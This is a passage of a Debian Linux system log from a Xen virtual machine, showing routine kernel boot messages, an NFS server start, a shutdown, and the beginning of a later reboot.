2584May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
2585May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
2586May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
2587May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
2588May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
2589May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
2590May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
2591May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
2592May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
2593May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
2594May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
2595May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
2596May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
2597May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
2598May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
2599May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
2600May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
2601May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
2602May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
2603May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
2604May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
2605May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
2606May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
2607May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
2608May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
2609May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
2610May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
2611May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
2612May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
2613May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
2614May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
2615May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
2616May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
2617May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
2618May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
2619May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
2620May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
2621May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
2622May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
2623May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
2624May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
2625May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
2626May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
2627May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
2628May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
2629May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
2630May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
2631May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
2632May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
2633May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
2634May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
2635May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
2636May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
2637May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
2638May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
2639May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
2640May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
2641May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
2642May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
2643May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
2644May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
2645May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
2646May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
2647May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
2648May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
2649May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
2650May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
2651May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
2652May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
2653May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
2654May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
2655May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
2656May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
2657May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
2658May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
2659May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
2660May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
2661May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
2662May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
2663May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
2664May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
2665May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
2666May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
2667May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
2668May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
2669May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
2670May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
2671May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
2672May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
2673May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
2674May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
2675May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
2676May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
2677May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
2678May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
2679May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
2680May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
2681May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
2682May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
2683May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
2684May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
2685May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
2686May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
2687May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
2688May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
2689May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
2690May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
2691May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
2692May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
2693May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
2694May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
2695May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
2696May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
2697May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
2698May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
2699May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
2700May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
2701May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
2702May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
2703May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
2704May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
2705May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
2706May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
2707May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
2708May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
2709May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
2710May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
2711May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
2712May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
2713May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
2714May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
2715May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
2716May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
2717May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
2718May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
2719May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
2720May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
2721May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
2722May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
2723May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
2724May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
2725May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
2726May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
2727May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
2728May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
2729May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
2730May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
2731May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
2732May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
2733May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
2734May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
2735May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
2736May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
2737May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
2738May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
2739May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
2740May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
2741May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
2742May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
2743May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
2744May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
2745May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
2746May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
2747May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
2748May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
2749May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
2750May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
2751May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
2752May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
2753May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
2754May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
2755May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
2756May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
2757May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
2758May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
2759May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
2760May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
2761May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
2762May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
2763May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
2764May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
2765May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
2766May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
2767May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
2768May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
2769May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
2770May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
2771May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
2772May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
2773May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
2774May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
2775May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
2776May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
2777May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
2778May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
2779May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
2780May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
2781May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
2782May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
2783May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
2784May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
2785May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
2786May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
2787May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
2788May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
2789May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
2790May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
2791May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
2792May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
2793May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
2794May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
2795May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
2796May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
2797May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
2798May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
2799May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
2800May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
2801May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
2802May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
2803May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
2804May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
2805May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
2806May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
2807May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
2808May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
2809May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
2810May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
2811May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
2812May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
2813May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
2814May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
2815May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
2816May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
2817May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
2818May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
2819May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
2820May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
2821May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
2822Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
2823Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
2824Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
2825Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
2826Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
2827Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
2828Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
2829Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
2830Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
2831Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
2832Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
2833Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
2834Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
2835Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
2836Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
2837Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
2838Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
2839Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
2840Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
2841Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
2842Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
2843Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
2844Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
2845Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
2846Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
2847Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
2848Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
2849Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
2850Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
2851Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
2852Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
2853Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
2854Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
2855Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
2856Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
2857Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
2858Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
2859Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
2860Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
2861Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
2862Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
2863Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
2864Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
2865Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
2866Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
2867Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
2868Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
2869Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
2870Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
2871Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
2872Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
2873Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
2874Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
2875Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
2876Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
2877Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
